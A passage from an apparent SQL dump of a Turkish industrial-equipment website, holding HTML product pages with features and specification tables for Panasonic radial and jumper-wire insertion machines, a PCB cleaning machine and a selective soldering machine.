değişimi&nbsp;olduk&ccedil;a kolaydır</div>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<div>Kılavuz Pin Sistemi ile malzeme uygun pozisyondaki her yere dizilebilir</div>\r\n</li>\r\n<li>\r\n<div style=\"text-align: left;\">2.5 ve 5 mm olarak iki farklı bacak aralıklı malzeme dizgi metodu mevcuttur</div>\r\n</li>\r\n</ul>\r\n</div>\r\n<table border=\"0\" style=\"font-family: Tahoma, Helvetica, Arial, sans-serif;\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td><img src=\"images/2el/rh6-head.jpg\" alt=\"\" width=\"200\" border=\"0\" /></td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td>&nbsp;</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>&nbsp;</h2>\r\n<div style=\"text-align: left;\"><img src=\"images/2el/rh6-angle.jpg\" alt=\"\" width=\"300\" border=\"0\" /></div>\r\n<div class=\"O\" style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</div>\r\n<h2 class=\"O\" style=\"font-size: 14px; font-family: Arial, Helvetica, sans-serif; font-weight: normal; color: #333333; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</h2>\r\n<p>&nbsp;</p>\r\n<table border=\"0\" id=\"zebra-blue\" dir=\"ltr\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">Makine İsmi</td>\r\n<td>PANASONIC RH6</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Model İsmi</td>\r\n<td>NM-8201</td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"3\">PCB Boyutları</td>\r\n<td>Kart Boyutları</td>\r\n<td>\r\n<div>330x250mm (max.)</div>\r\n<div>150x80mm (min.)</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>Dizgi Boyutları</td>\r\n<td>\r\n<div>330x240mm (max.)</div>\r\n<div>150x70mm (min.)</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>Kart Kalınlığı</td>\r\n<td>1.6 &plusmn;0.15 mm</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td colspan=\"2\">Kart Transfer S&uuml;resi (sn)</td>\r\n<td>~4.5sn</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Malzeme Yerleştirme Y&ouml;n&uuml;</td>\r\n<td>2 Y&ouml;nl&uuml; 0&deg;, 90&deg;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Giriş (Feeder) Sayısı</td>\r\n<td>40</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Dizgi Hızı (sn/malzeme)</td>\r\n<td>0.6</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Maksimum Malzeme Y&uuml;ksekliği (mm)</td>\r\n<td>16</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Malzeme Bacak Aralığı (mm)</td>\r\n<td>2.5 veya 5.0</td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"3\">Kesme vePer&ccedil;inlemeMetodu</td>\r\n<td>Per&ccedil;inleme Bacak&nbsp;Uzunluğu</td>\r\n<td>1.5&nbsp;&plusmn;0.3 mm</td>\r\n</tr>\r\n<tr>\r\n<td>Per&ccedil;inleme A&ccedil;ısı</td>\r\n<td>~15&deg;</td>\r\n</tr>\r\n<tr>\r\n<td>B&uuml;kme A&ccedil;ısı</td>\r\n<td>~35&deg;&nbsp;veya 45&deg;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Kontrol Sistemi</td>\r\n<td>Panadac 770 microcomputer; X, Y ve Z eksenleri&nbsp;DC servomotorlu yarı kapalı &ccedil;evrim kontrol</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Hava Beslemesi ve T&uuml;ketimi</td>\r\n<td>5kg/cm2, 250N/dak</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">G&uuml;&ccedil; Beslemesi</td>\r\n<td>AC 3-faz&nbsp; 380V 50 Hz</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">&Ccedil;alışma g&uuml;c&uuml;</td>\r\n<td>2.3 KVA</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Makine Boyutları (Boy x En x Y&uuml;kseklik)</td>\r\n<td>3860 x 1590 x 1845mm</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Ağırlık</td>\r\n<td>1750kg</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<h3 class=\"O\" style=\"text-align: left;\"><span>Dizilebilir Komponentler</span></h3>\r\n<h3 class=\"O\" style=\"text-align: left;\"><span>(12.7 mm aralıklı şerit &uuml;zerinde)</span></h3>\r\n<ul>\r\n<li style=\"text-align: left;\"><span></span>K&uuml;&ccedil;&uuml;k Komponentler (LCD:2.5mm);&nbsp;Seramik Kapasit&ouml;rler (&Phi;3-5mm), Elektrolitik Kapasit&ouml;rler (<span style=\"text-align: left;\">&Phi;</span>3-6.3mm),&nbsp;radyal bacaklı diren&ccedil;ler, vb</li>\r\n<li style=\"text-align: left;\">Standart Komponentler&nbsp;(LCD:5mm);&nbsp;Seramik Kapasit&ouml;rler (<span style=\"text-align: left;\">&Phi;</span>3-11mm), Elektrolitik Kapasit&ouml;rler (<span style=\"text-align: left;\">&Phi;</span>3-10mm),&nbsp;Film Kapasit&ouml;rler (3W-12W), radyal bacaklı diren&ccedil;ler, transist&ouml;rler (TO-92), vb</li>\r\n<li style=\"text-align: left;\">Diğerleri; LED\'er, k&uuml;&ccedil;&uuml;k dik diren&ccedil;ler, potansiyometreler, basmalı switchler, ayarlı kapasit&ouml;rler, radyal&nbsp;bobinler, SIP IC\'ler, vb&nbsp;</li>\r\n</ul>\r\n<p>&nbsp;</p>','RH6','','','','rh6'),(20,'Radyal Dizgi','<h2 style=\"text-align: left;\">Panasonic Radyal Dizgi - RHII</h2>\r\n<table border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td><img src=\"images/2el/rh2.jpg\" alt=\"\" width=\"300\" height=\"220\" /></td>\r\n<td><img src=\"images/2el/rh2-arka.jpg\" alt=\"\" width=\"300\" height=\"225\" />&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td>&nbsp;</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Genel &Ouml;zellikler</h2>\r\n<ul>\r\n<li>\r\n<div style=\"text-align: left;\">Delik pozisyonlarının kamera sistemi ile tanımlanması</div>\r\n</li>\r\n<li style=\"text-align: left;\">62 farklı &ccedil;eşit radyal malzeme i&ccedil;in besleme slotları</li>\r\n<li style=\"text-align: left;\">Yaklaşık 0.45 saniye/malzeme dizgi hızı</li>\r\n<li style=\"text-align: left;\">Servo motor kontrol sistemi ile daha kararlı ve sessiz &ccedil;alışma</li>\r\n<li style=\"text-align: left;\">Kılavuz pin sistemi ile y&uuml;ksek yoğunlukta dizgi ve 0.45 saniye/malzeme hıza ulaşır</li>\r\n<li style=\"text-align: left;\">V cut metodu k&uuml;&ccedil;&uuml;k &ccedil;aplı deliklerde dahi daha kararlı bir dizgi sağlar</li>\r\n<li style=\"text-align: left;\">Auto Recovery fonksiyonu ile hatalı dizilen malzemenin pozisyonu kamera ile kontrol edilip yeniden&nbsp;dizilir. B&ouml;ylece kesintisiz &uuml;retim ve daha az duruş zamanı sağlanır</li>\r\n<li style=\"text-align: left;\">2.5 ve 5 mm bacak aralıklı malzemeler 21mm y&uuml;ksekliğe kadar monte edilebilir-</li>\r\n</ul>\r\n<p>-</p>\r\n<table border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<div><img src=\"images/2el/rh2-head.jpg\" alt=\"\" width=\"200\" border=\"0\" /></div>\r\n</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td><br />\r\n<div><img src=\"images/2el/rh2-komp.jpg\" alt=\"\" width=\"400\" border=\"0\" /></div>\r\n</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td><br />\r\n<div><img src=\"images/2el/rh2-feeder.jpg\" alt=\"\" width=\"400\" border=\"0\" /></div>\r\n</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>&nbsp;</h2>\r\n<h2>&nbsp;</h2>\r\n<table border=\"0\" id=\"zebra-blue\" dir=\"ltr\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">Makine İsmi</td>\r\n<td>PANASONIC RHII</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Model İsmi</td>\r\n<td>NM-8821</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Delik Doğrulama Sistemi</td>\r\n<td>Kamera ile tanıma</td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"3\">PCB Boyutları</td>\r\n<td>Kart Boyutları</td>\r\n<td>\r\n<div>330x250mm (max.)</div>\r\n<div>150x80mm (min.)</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>Dizgi Boyutları</td>\r\n<td>\r\n<div>330x240mm (max.)</div>\r\n<div>150x70mm (min.)</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>Kart Kalınlığı</td>\r\n<td>1.6 &plusmn;0.15 mm</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Dizgi Delik &Ccedil;apı (mm)</td>\r\n<td>0.95&nbsp;&plusmn;0.05</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Malzeme Yerleştirme Y&ouml;n&uuml;</td>\r\n<td>2 Y&ouml;nl&uuml; 0&deg;, 90&deg;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Giriş (Feeder) Sayısı</td>\r\n<td>62 (Max)</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Dizgi Hızı (sn/malzeme)</td>\r\n<td>0.45 / 0.6 / 0.8</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Malzeme G&ouml;vde Boyutu (mm)</td>\r\n<td>&Atilde;3 ile&nbsp;&Atilde;13</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Maksimum Malzeme Y&uuml;ksekliği (mm)</td>\r\n<td>21</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Malzeme Bacak Aralığı (mm)</td>\r\n<td>2.5 veya 5.0</td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"3\">Kesme vePer&ccedil;inlemeMetodu</td>\r\n<td>Per&ccedil;inleme Bacak&nbsp;Uzunluğu</td>\r\n<td>1.5&nbsp;&plusmn;0.3 mm</td>\r\n</tr>\r\n<tr>\r\n<td>Per&ccedil;inleme A&ccedil;ısı</td>\r\n<td>~15&deg;</td>\r\n</tr>\r\n<tr>\r\n<td width=\"83\" height=\"15\">B&uuml;kme A&ccedil;ısı</td>\r\n<td>~35&deg;&nbsp;veya 45&deg;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Kontrol Sistemi</td>\r\n<td>Microcomputer; AC servomotorlu yarı kapalı &ccedil;evrim kontrol, 10 renkli monit&ouml;r</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Hava Beslemesi ve T&uuml;ketimi</td>\r\n<td>5kg/cm2, 120N&acirc;/dak</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">G&uuml;&ccedil; Beslemesi</td>\r\n<td>AC 3-faz380V 50 Hz</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">&Ccedil;alışma g&uuml;c&uuml;</td>\r\n<td>3.4 KVA</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Makine Boyutları (Boy x En x Y&uuml;kseklik)</td>\r\n<td>4525 x 1831 x 1650mm</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Ağırlık</td>\r\n<td>2100kg</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><span style=\"font-size: 1.5em;\"></span></p>\r\n<h2 style=\"text-align: left;\">Dizilebilir Komponentler</h2>\r\n<h2 style=\"text-align: left;\">(12.7 mm aralıklı şerit &uuml;zerinde)</h2>\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"text-align: left;\">K&uuml;&ccedil;&uuml;k Komponentler (LCD:2.5mm);&nbsp;Seramik Kapasit&ouml;rler (&Phi;3-5mm), Elektrolitik Kapasit&ouml;rler (&Phi;3-6.5mm),&nbsp;radyal bacaklı diren&ccedil;ler, vb</li>\r\n<li style=\"text-align: left;\">Standart Komponentler&nbsp;(LCD:5mm);&nbsp;Seramik Kapasit&ouml;r (&Phi;3-&Phi;13mm), Elektrolitik Kapasit&ouml;rler (&Phi;3 - 12.5mm), Film Kapasit&ouml;rler (3W-14W), radyal bacaklı diren&ccedil;ler, transist&ouml;rler (TO-92), vb</li>\r\n<li style=\"text-align: left;\">Diğerleri; LED\'ler, k&uuml;&ccedil;&uuml;k dik diren&ccedil;ler, potansiyometreler, basmalı switchler, ayarlı kapasit&ouml;rler, radyal&nbsp;bobinler, SIP IC\'er, vb</li>\r\n</ul>','RH2','','','','rh2'),(21,'Radyal Dizgi','<h2 style=\"text-align: left;\">Panasonic Radyal Dizgi - RHIII</h2>\r\n<table border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td><img src=\"images/2el/rh2.jpg\" alt=\"\" width=\"300\" height=\"220\" /></td>\r\n<td><img src=\"images/2el/rh2-arka.jpg\" alt=\"\" width=\"300\" height=\"225\" style=\"font-size: 10px; text-align: start;\" />&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px;\">&nbsp;</td>\r\n<td style=\"font-size: 10px;\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3 style=\"text-align: left;\">Genel &Ouml;zellikler</h3>\r\n<ul style=\"text-align: left;\">\r\n<li>\r\n<div class=\"O\"><span>Delik pozisyonlarının kamera sistemi ile tanımlanması</span></div>\r\n</li>\r\n<li><span>62 farklı &ccedil;eşit radyal malzeme i&ccedil;in besleme slotları</span></li>\r\n<li><span>Yaklaşık 0.45 saniye/malzeme dizgi hızı</span></li>\r\n<li><span>Servo motor kontrol sistemi ile daha kararlı ve sessiz &ccedil;alışma</span></li>\r\n<li><span>Kılavuz pin sistemi ile y&uuml;ksek yoğunlukta dizgi ve 0.45 saniye/malzeme hıza ulaşır</span></li>\r\n<li><span>V cut metodu k&uuml;&ccedil;&uuml;k &ccedil;aplı deliklerde dahi daha kararlı bir dizgi sağlar</span></li>\r\n<li><span><span><span><span>Auto Recovery fonksiyonu ile hatalı dizilen malzemenin pozisyonu kamera ile kontrol edilip yeniden&nbsp;</span><span>dizilir. B&ouml;ylece kesintisiz &uuml;retim ve daha az duruş zamanı sağlanır</span></span></span></span></li>\r\n<li><span>2.5 ve 5 mm bacak aralıklı malzemeler 21mm y&uuml;ksekliğe kadar monte edilebilir</span><span>-</span></li>\r\n</ul>\r\n<p class=\"O\" style=\"text-align: left;\"><span>-</span></p>\r\n<table border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<div style=\"text-align: left;\"><img src=\"images/2el/rh2-head.jpg\" alt=\"\" width=\"200\" border=\"0\" /></div>\r\n</td>\r\n<td style=\"text-align: left;\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td><br />\r\n<div style=\"text-align: center;\"><img src=\"images/2el/rh2-komp.jpg\" alt=\"\" width=\"400\" border=\"0\" /></div>\r\n</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: left;\"><br />\r\n<div style=\"text-align: center;\"><img src=\"images/2el/rh2-feeder.jpg\" alt=\"\" width=\"400\" border=\"0\" /></div>\r\n</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<table border=\"0\" id=\"zebra-blue\" dir=\"ltr\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">Makine İsmi</td>\r\n<td>PANASONIC RHIII</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Model İsmi</td>\r\n<td>NM-8224B</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Delik Doğrulama Sistemi</td>\r\n<td>Kamera ile tanıma</td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"3\">PCB Boyutları</td>\r\n<td>Kart Boyutları</td>\r\n<td>\r\n<div>330x250mm (max.)</div>\r\n<div>150x80mm (min.)</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>Dizgi Boyutları</td>\r\n<td>\r\n<div>330x240mm (max.)</div>\r\n<div>150x70mm (min.)</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>Kart Kalınlığı</td>\r\n<td>1.6 &plusmn;0.15 mm</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Dizgi Delik &Ccedil;apı (mm)</td>\r\n<td>0.95&nbsp;&plusmn;0.05</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Malzeme Yerleştirme Y&ouml;n&uuml;</td>\r\n<td>2 Y&ouml;nl&uuml; 0&deg;, 90&deg;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Giriş (Feeder) Sayısı</td>\r\n<td>62 (Max)</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Dizgi Hızı (sn/malzeme)</td>\r\n<td>0.45 / 0.6 / 0.8</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Malzeme G&ouml;vde Boyutu (mm)</td>\r\n<td>&Phi;3 ile <span style=\"font-size: 16px; text-align: left;\">&Phi;</span>13mm</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Maksimum Malzeme Y&uuml;ksekliği (mm)</td>\r\n<td>21</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Malzeme Bacak Aralığı (mm)</td>\r\n<td>2.5 veya 5.0</td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"3\">Kesme vePer&ccedil;inlemeMetodu</td>\r\n<td>Per&ccedil;inleme Bacak&nbsp;Uzunluğu</td>\r\n<td>1.5&nbsp;&plusmn;0.3 mm</td>\r\n</tr>\r\n<tr>\r\n<td>Per&ccedil;inleme A&ccedil;ısı</td>\r\n<td>~15<span style=\"font-size: 16px; text-align: left;\">&deg;</span></td>\r\n</tr>\r\n<tr>\r\n<td>B&uuml;kme A&ccedil;ısı</td>\r\n<td>~35&deg;&nbsp;veya 45&deg;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Kontrol Sistemi</td>\r\n<td>Microcomputer; AC servomotorlu yarı kapalı &ccedil;evrim kontrol, 10 renkli monit&ouml;r</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Hava Beslemesi ve T&uuml;ketimi</td>\r\n<td>5kg/cm2, 120N/dak</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">G&uuml;&ccedil; Beslemesi</td>\r\n<td>AC 3-faz380V 50 Hz</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">&Ccedil;alışma g&uuml;c&uuml;</td>\r\n<td>3.4 KVA</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Makine Boyutları (Boy x En x Y&uuml;kseklik)</td>\r\n<td>4525 x 1831 x 1650mm</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Ağırlık</td>\r\n<td>2100kg</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<h3 style=\"text-align: left;\"><span style=\"font-size: 12pt;\">Dizilebilir Komponentler</span></h3>\r\n<h3 style=\"text-align: left;\"><span style=\"font-size: 10pt;\">(12.7 mm aralıklı şerit &uuml;zerinde)</span></h3>\r\n<ul>\r\n<li style=\"text-align: left;\">K&uuml;&ccedil;&uuml;k Komponentler (LCD:2.5mm);&nbsp;Seramik Kapasit&ouml;rler (<span style=\"text-align: left;\">&Phi;</span>3-<span style=\"text-align: left;\">&Phi;</span>5mm), Elektrolitik Kapasit&ouml;rler (<span style=\"text-align: left;\">&Phi;</span>3-<span style=\"text-align: left;\">&Phi;</span>6.5mm),&nbsp;radyal bacaklı diren&ccedil;ler, vb</li>\r\n<li style=\"text-align: left;\">Standart Komponentler&nbsp;(LCD:5mm);&nbsp;Seramik Kapasit&ouml;r (<span style=\"text-align: left;\">&Phi;</span>3-<span style=\"text-align: left;\">&Phi;</span>13mm), Elektrolitik Kapasit&ouml;rler (<span style=\"text-align: left;\">&Phi;</span>3-<span style=\"text-align: left;\">&Phi;</span>12.5mm), Film Kapasit&ouml;rler (3W-14W), radyal bacaklı diren&ccedil;ler, transist&ouml;rler (TO-92), vb</li>\r\n<li style=\"text-align: left;\">Diğerleri; LED\'ler, k&uuml;&ccedil;&uuml;k dik diren&ccedil;ler, potansiyometreler, basmalı switchler, ayarlı kapasit&ouml;rler, radyal&nbsp;bobinler, SIP IC\'er, vb</li>\r\n</ul>','RH3','','','','rh2-20'),(22,'Kısa-devre Dizgi','<h2 style=\"text-align: left;\">Panasonic Kısa-Devre Dizgi Makinesi - JVK</h2>\r\n<table border=\"0\" style=\"float: left;\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td><img src=\"images/2el/jvk.jpg\" alt=\"\" width=\"300\" border=\"0\" /></td>\r\n<td>&nbsp;<img src=\"images/2el/jvk-arka.jpg\" alt=\"\" width=\"300\" style=\"text-align: start;\" border=\"0\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2 style=\"font-weight: normal; text-align: left;\">&nbsp;</h2>\r\n<h3 style=\"text-align: left;\">&nbsp;Genel &Ouml;zellikler</h3>\r\n<ul>\r\n<li>\r\n<p style=\"text-align: left;\">Makaradan gelen 0.6mm &ccedil;apında kısa devre tellerini hızlı ve hatasız şekilde dizer</p>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<p>-S&uuml;rekli &ccedil;alışmada 0.2 saniye/kısa devre teli dizgi hızına sahiptir</p>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<p>-Offset tanımlama sistemi ile y&uuml;ksek dizgi verimliliği sağlar</p>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<p>-AC Servomotorlar ile daha hızlı ve kararlı &ccedil;alışma</p>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<p>-Renkli CRT monit&ouml;r ile kolay operat&ouml;r kullanımı sağlar</p>\r\n</li>\r\n<li>\r\n<p style=\"text-align: left;\">-&nbsp;0&deg;&nbsp;ve 90&deg;&nbsp;iki farklı a&ccedil;ıda dizgi ger&ccedil;ekleştirebilir</p>\r\n</li>\r\n</ul>\r\n<table border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td><img src=\"images/2el/jvk-diagram1.jpg\" alt=\"\" width=\"250\" /></td>\r\n<td><img src=\"images/2el/jvk-diagram2.jpg\" alt=\"\" width=\"250\" /></td>\r\n</tr>\r\n<tr>\r\n<td><img src=\"images/2el/jvk-feed.jpg\" alt=\"\" width=\"250\" height=\"187\" style=\"text-align: left;\" /></td>\r\n<td><img src=\"images/2el/jvk-monitor.jpg\" alt=\"\" width=\"250\" height=\"386\" style=\"text-align: left;\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>&nbsp;</h2>\r\n<table border=\"0\" id=\"zebra-blue\" dir=\"ltr\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">Makine İsmi</td>\r\n<td>PANASONIC JVK</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Model İsmi</td>\r\n<td>NM-2037</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Delik Doğrulama Sistemi</td>\r\n<td>Kamera ile tanıma</td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"3\">PCB Boyutları</td>\r\n<td>Kart Boyutları</td>\r\n<td>508x381mm (max.) 90x60mm (min.)</td>\r\n</tr>\r\n<tr>\r\n<td>Dizgi Boyutları</td>\r\n<td>508x371mm (max.)</td>\r\n</tr>\r\n<tr>\r\n<td>Kart Kalınlığı</td>\r\n<td>1.6 &plusmn;0.15 mm</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Dizgi Delik &Ccedil;apı (mm)</td>\r\n<td>1.05&nbsp;&plusmn;0.05</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Kısa Devre Teli Kalınlığı</td>\r\n<td>0.6&plusmn;0.02</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\" >Malzeme Yerleştirme Y&ouml;n&uuml;</td>\r\n<td>2 Y&ouml;ne 0&deg;, 90&deg;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Besleme Şekli</td>\r\n<td >Yer makarası</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\" >Dizgi Hızı (sn/malzeme)</td>\r\n<td >0.2 (S&uuml;rekli &ccedil;alışmada)</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\" >Kısa Devre Teli Bacak Aralığı (mm)</td>\r\n<td>5-31 ayarlanabilir</td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"3\" width=\"79\" height=\"54\">\r\n<p>Kesme ve</p>\r\n<p>Per&ccedil;inlemeMetodu</p>\r\n</td>\r\n<td >Per&ccedil;inleme BacakUzunluğu</td>\r\n<td>1.5&nbsp;&plusmn;0.3 mm</td>\r\n</tr>\r\n<tr>\r\n<td>Per&ccedil;inleme A&ccedil;ısı</td>\r\n<td >~15&deg;</td>\r\n</tr>\r\n<tr>\r\n<td >B&uuml;kmek A&ccedil;ısı</td>\r\n<td >~35&deg;&nbsp;veya 45&deg;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\" >Kontrol Sistemi</td>\r\n<td >Panadac 783A microcomputer; AC servomotorlu&nbsp;yarı kapalı &ccedil;evrim kontrol (6-eksen)</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\" >Hava Beslemesi ve T&uuml;ketimi</td>\r\n<td>5kg/cm2, 15N&acirc;/dak</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\" >G&uuml;&ccedil; Beslemesi</td>\r\n<td>AC 3 faz380V 50 Hz</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\" >&Ccedil;alışma g&uuml;c&uuml;</td>\r\n<td >3KVA</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\" >Makine Boyutları (Boy x En x Y&uuml;kseklik)</td>\r\n<td >1810 x 1465 x 1350mm</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\" >Ağırlık</td>\r\n<td>1450kg</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;&nbsp;</p>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<p>Yere konulan makaradaki kısa-devre telleri</p>\r\n<p style=\"text-align: left;\">&nbsp;</p>','JVK','','','','jvk'),(23,'PCB Temizleme','<p>&nbsp;</p>\r\n<h5 style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; line-height: 15.807999610900879px; text-align: start;\">Tam Otomatik Banyo Tipi PCB Temizleme Makinesi</h5>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p>&nbsp;</p>\r\n<table style=\"font-family: Tahoma, Helvetica, Arial, sans-serif;\" border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px;\">&nbsp;<img src=\"images/aqueous/Trident_Full_View.jpg\" alt=\"\" /></td>\r\n<td style=\"font-size: 10px;\">\r\n<ul>\r\n<li><strong>Tüm flux artıklarını&nbsp;(reçine, suda çözünen, No-Clean) mükemmel temizler</strong></li>\r\n<li><strong>Elektronik dizgi prosesi için özel olarak dizayn edilmiştir</strong></li>\r\n<li><strong>Askeri, IPC, medikal ve diğer yüksek hassasiyet gerektiren temizlik standartlarını karşılayan temizleme</strong></li>\r\n<li><strong>Focus-Wash temizleme teknolojisiyle yoğun kartlarda dahi&nbsp;mükemmel performans</strong></li>\r\n<li><strong>Hareketli PCB kasası ve asimetrik sprey kolları ile gölgeleme etkisini giderir</strong></li>\r\n<li><strong>Dahili temizlik test sistemi</strong></li>\r\n</ul>\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\"><img src=\"images/aqueous/Trident_tablo_1.jpg\" alt=\"\" width=\"600\" height=\"359\" /></p>\r\n<p style=\"text-align: left;\"><img src=\"images/aqueous/Trident_tablo_2.jpg\" alt=\"\" width=\"600\" height=\"467\" /></p>','Trident','','','','trident'),(24,'Bölgesel Lehimleme','<h2 >ESS-500 B&ouml;lgesel Lehimleme Makinesi</h2>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<ul style=\"text-align: left;\">\r\n<li>El ile lehimleme prosesinden kurtulmak i&ccedil;in&nbsp;ekonomik &ccedil;&ouml;z&uuml;m&nbsp;</li>\r\n<li>Flux uygulama, &ouml;n ısıtma ve b&ouml;lgesel lehimleme mod&uuml;lleriyle b&uuml;t&uuml;nleşik lehimleme sistemi</li>\r\n<li>&nbsp;\'PhotoScan\' yazılımıyla 